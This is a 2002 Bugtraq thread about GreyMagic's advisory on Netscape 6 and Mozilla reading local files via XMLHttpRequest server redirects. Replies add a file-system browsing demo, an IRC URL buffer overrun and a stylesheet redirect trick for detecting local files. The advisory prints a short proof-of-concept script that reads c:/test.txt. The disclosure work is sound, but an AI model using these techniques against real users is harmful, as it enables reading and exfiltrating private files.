UPDATE (1-May-2002): Reading local files in Netscape 6 and Mozilla (GM#001-NS)
Hello, A bit after we released the advisory we received two emails, which notified us that through testing in our demonstration, they found out that this bug can also be used to list files in folders. That alone, makes this bug far more volatile than the one patched by MS02-008. It is possible to recursively build a tree of the victim's file system, along with size, date and the content of files. This vulnerability opens the entire file system up for reading (as long as the browser user has access). We added a "Mozilla Disk Explorer" demonstration to our advisory, which lets you browse through your local disk, entering folders and reading files with a simple click. Everything you see in this demonstration could be easily transferred to an attacking server, logging your file system structure and contents (without need for user interaction, of course). You can view it at http://sec.greymagic.com/adv/gm001-ns/mozexplorer.html Thanks to "loon" and Gerd Zemella for letting us know. On a different note, this issue has been fixed by the Mozilla crew, thanks for the quick patch. - GMS
RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
Funny, so much rant about not receiving any contact from Netscape (AOL subsidiary) or about not even giving prior notification to the developers about the bug AND, all in all, no one even posts to a bugzilla entry on bugzilla.mozilla.org which is the best place for bug reports on Mozilla (ie, *not marketdroid webpages*). This is either ignorance of bugzilla (bad but I can understand that), or intention to difamate the mozilla developers, which is very bad, since a lot of them dedicate their free time on providing us an extremely standards compliant, Free Software, cross platform web browser, and so we actually owe them a favour (so to speak). If it is ignorance, I will, then, try to educate: 1. load your favorite browser, and go to http://bugzilla.mozilla.org 2. submit bug 3. if very urgent, go to irc.mozilla.org, /join #mozillazine and SCREAM SECURITY BUG, can anyone urgently look at *URL*FOR*BUG*ID, please? I can help with details. In any other case than having first tryed to do that, this rant seems absolutely unecessary. Regards -- + No matter how much you do, you never do enough -- unknown + Whatever you do will be insignificant, | but it is very important that you do it -- Ghandi + So let's do it...? signature.asc Description: This is a digitally signed message part
RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
> Demonstration: > == > > A fully dynamic proof-of-concept demonstration > of this issue is available at > http://security.greymagic.com/adv/gm001-ns/. As some of you may have noticed, the above proof-of-concept does not work in Mozilla 1.0 Release Candidate 1. Don't get your hopes high about this though, the issue has not been fixed in moz1rc1 - the XMLHttpRequest was simply broken in this version of the browser for unknown reasons, a fact not mentioned in the release notes. When trying to use it, either nothing happens or the browser crashes. The proof-of-concept works just fine in Mozilla 0.9.9 (and NS6.1+), and would work fine in moz1rc1 if the XMLHttpRequest object could be used at all. The Mozilla XML-Extras project also includes a document.load method that is used to load XML documents. The same issue applies to this method, and a proof-of-concept demonstration that also works in moz1rc1 can be found at http://jscript.dk/2002/4/NS6Tests/documentload.html Regards Thor Larholm Jubii A/S - Internet Programmer
RE: Reading local files in Netscape 6 and Mozilla (GM#001-NS)
Disturbing. Netscape sure must be in financial problems since they are selling out on their users security for a lousy $1000. I know for one that I personally will release any future Netscape advisories with full public disclosure and without prior Netscape notification. As a matter of fact, why not start now ? The IRC:// protocol inhibited by Mozilla/NS6 seems to have a buffer overrun. A typical IRC URL could look like this: IRC://IRC.YOUR.TLD/#YOURCHANNEL The #YOURCHANNEL part is copied to a buffer that has a limit of 32K. If the input exceeds this limit, Mozilla 1.0 RC1 crashes with the following error: The exception unknown software exception (0xc0fd) occured in the application at location 0x60e42edf Mozilla 0.9.9 gives a similar exception: The exception unknown software exception (0xc0fd) occured in the application at location 0x60dd2c79. Other versions of Mozilla/NS6/Galeon likely share the same flaw. I haven't tested further on how practically exploitable this is. Short example online at http://jscript.dk/2002/4/moz1rc1tests/ircbufferoverrun.html Furthermore, Mozilla/Galeon/NS6 is prone to a local file detection vulnerability. When embedding a stylesheet with the element, access to CSS files from other protocols is prohibited by the security manager. A simple HTTP redirect circumvents this security restriction and it becomes possible to use local or remote files of any type, with the side effect that you can detect if specific local files exist. http://jscript.dk/2002/4/NS6Tests/LinkLocalFileDetect.asp Regards Thor Larholm Jubii A/S - Internet Programmer -Original Message- From: GreyMagic Software [mailto:[EMAIL PROTECTED]] Sent: 30. april 2002 03:11 To: NTBugtraq; Bugtraq Subject: Reading local files in Netscape 6 and Mozilla (GM#001-NS) GreyMagic Security Advisory GM#001-NS = By GreyMagic Software, Israel. 30 Apr 2002. Available in HTML format at http://security.greymagic.com/adv/gm001-ns/. Topic: Reading local files in Netscape 6 and Mozilla. Discovery date: 30 Mar 2002. Affected applications: == * All tested versions of Mozilla (0.9.7+) on Windows, other versions/platforms are believed to be vulnerable. * All tested versions of Netscape (6.1+) on Windows, other versions/platforms are believed to be vulnerable. Important notes: Netscape was contacted on 24 Apr 2002 through a form on their web site and through email to [EMAIL PROTECTED] and [EMAIL PROTECTED] They did not bother to respond AT ALL, and we think we know why. A while ago Netscape started a "Bug Bounty" program, which entitles researchers who find a bug that allows an attacker to run unsafe code or access files to a $1000 reward. By completely disregarding our post Netscape has earned themselves a $1000 and lost any credibility they might have had. The money is irrelevant, but using such a con to attract researchers into disclosing bugs to Netscape is extremely unprofessional. Netscape's faulty conducts made us rethink our disclosure guidelines and we came to the following decisions: * Release all future Netscape advisories without notifying Netscape at all. * Advise the security community to do the same. Netscape is deceiving researchers and should not be rewarded. * Advise customers to stop using Netscape Navigator through our security advisories and business contacts. [1] http://home.netscape.com/security/bugbounty.html Introduction: = XMLHTTP is a component that is primarily used for retrieving XML documents from a web server. On 15 Dec 2001 "Jelmer" published an advisory titled "MSIE6 can read local files", which demonstrated how Microsoft's XMLHTTP component allows reading of local files by blindly following server-side redirections (patched by MS02-008). [1] http://www.xs4all.nl/~jkuperus/bug.htm [2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp Discussion: === Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to the exact same attack. By directing the "open" method to a web page that will redirect to a local/remote file it is possible to fool Mozilla into thinking it's still in the allowed zone, therefore allowing us to read it. It is then possible to inspect the content by using the responseText property. Exploit: This example attempts to read "c:/test.txt", "getFile.asp" internally redirects to "file://c:/test.txt": var oXML=new XMLHttpRequest(); oXML.open("GET","getFile.asp",false); oXML.send(null); alert(oXML.responseText); Solution: = Users of Netscape Navigator should move to a better performing, less buggy browser. Tested on: == Mozilla 0.9.7, NT4. Mozilla 0.9.9, NT4. Mozilla 0.9.9, Win2000. Netscape 6.1, NT4. Netscape 6.2.1, Win2000. Netscape 6.2.2, NT4. Netscape 6.2.2, Win
Reading local files in Netscape 6 and Mozilla (GM#001-NS)
GreyMagic Security Advisory GM#001-NS = By GreyMagic Software, Israel. 30 Apr 2002. Available in HTML format at http://security.greymagic.com/adv/gm001-ns/. Topic: Reading local files in Netscape 6 and Mozilla. Discovery date: 30 Mar 2002. Affected applications: == * All tested versions of Mozilla (0.9.7+) on Windows, other versions/platforms are believed to be vulnerable. * All tested versions of Netscape (6.1+) on Windows, other versions/platforms are believed to be vulnerable. Important notes: Netscape was contacted on 24 Apr 2002 through a form on their web site and through email to [EMAIL PROTECTED] and [EMAIL PROTECTED] They did not bother to respond AT ALL, and we think we know why. A while ago Netscape started a "Bug Bounty" program, which entitles researchers who find a bug that allows an attacker to run unsafe code or access files to a $1000 reward. By completely disregarding our post Netscape has earned themselves a $1000 and lost any credibility they might have had. The money is irrelevant, but using such a con to attract researchers into disclosing bugs to Netscape is extremely unprofessional. Netscape's faulty conducts made us rethink our disclosure guidelines and we came to the following decisions: * Release all future Netscape advisories without notifying Netscape at all. * Advise the security community to do the same. Netscape is deceiving researchers and should not be rewarded. * Advise customers to stop using Netscape Navigator through our security advisories and business contacts. [1] http://home.netscape.com/security/bugbounty.html Introduction: = XMLHTTP is a component that is primarily used for retrieving XML documents from a web server. On 15 Dec 2001 "Jelmer" published an advisory titled "MSIE6 can read local files", which demonstrated how Microsoft's XMLHTTP component allows reading of local files by blindly following server-side redirections (patched by MS02-008). [1] http://www.xs4all.nl/~jkuperus/bug.htm [2] http://www.microsoft.com/technet/security/bulletin/MS02-008.asp Discussion: === Mozilla's version of XMLHTTP, the XMLHttpRequest object, is vulnerable to the exact same attack. By directing the "open" method to a web page that will redirect to a local/remote file it is possible to fool Mozilla into thinking it's still in the allowed zone, therefore allowing us to read it. It is then possible to inspect the content by using the responseText property. Exploit: This example attempts to read "c:/test.txt", "getFile.asp" internally redirects to "file://c:/test.txt": var oXML=new XMLHttpRequest(); oXML.open("GET","getFile.asp",false); oXML.send(null); alert(oXML.responseText); Solution: = Users of Netscape Navigator should move to a better performing, less buggy browser. Tested on: == Mozilla 0.9.7, NT4. Mozilla 0.9.9, NT4. Mozilla 0.9.9, Win2000. Netscape 6.1, NT4. Netscape 6.2.1, Win2000. Netscape 6.2.2, NT4. Netscape 6.2.2, Win2000. Demonstration: == A fully dynamic proof-of-concept demonstration of this issue is available at http://security.greymagic.com/adv/gm001-ns/. Feedback: = Please mail any questions or comments to [EMAIL PROTECTED] - Copyright © 2002 GreyMagic Software.